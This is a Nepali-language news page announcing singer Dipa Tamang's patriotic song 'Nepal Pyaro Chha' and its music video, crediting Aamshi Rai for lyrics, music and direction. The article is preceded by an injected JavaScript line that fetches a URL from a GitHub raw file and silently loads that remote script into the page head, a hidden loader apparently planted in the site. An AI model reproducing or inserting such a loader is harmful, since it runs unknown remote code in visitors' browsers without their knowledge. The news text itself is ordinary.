;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दिपाको देशप्रेम गीत ‘नेपाल प्यारो छ’सार्वजनिक (भिडियोसहित) – जुनेली न्युज
बिहिबार, असार २७, २०८२
  • होमपेज
  • दिपाको देशप्रेम गीत ‘नेपाल प्यारो छ’सार्वजनिक (भिडियोसहित)
अन्तर्वार्ता

दिपाको देशप्रेम गीत ‘नेपाल प्यारो छ’सार्वजनिक (भिडियोसहित)

असोज ४,

काठमाडौँ । गायिका दिपा तामाङको गीत ‘नेपाल प्यारो छ’ सार्बजनिक भएको छ । आमशी राईको शब्द, संगीत रहेको गीतको म्युजिक भिडियो सहित सार्वजनिक भएको हो ।

गीतको भिडियोको कोरियोग्राफी तथा निर्देशन आमशी राईले गरेका हुन् । जसमा छायांकन तथा सम्पादन बिनोद मगरको रहेको छ ।

देशको सौदर्यताको बर्णन गरिएको गीतको म्युजिक भिडियोमा जेनिशा गुरुङ, रोमा राई लगायतका कलाकारको अभिनय रहेको छ ।

फेसबुक प्रतिक्रियाहरु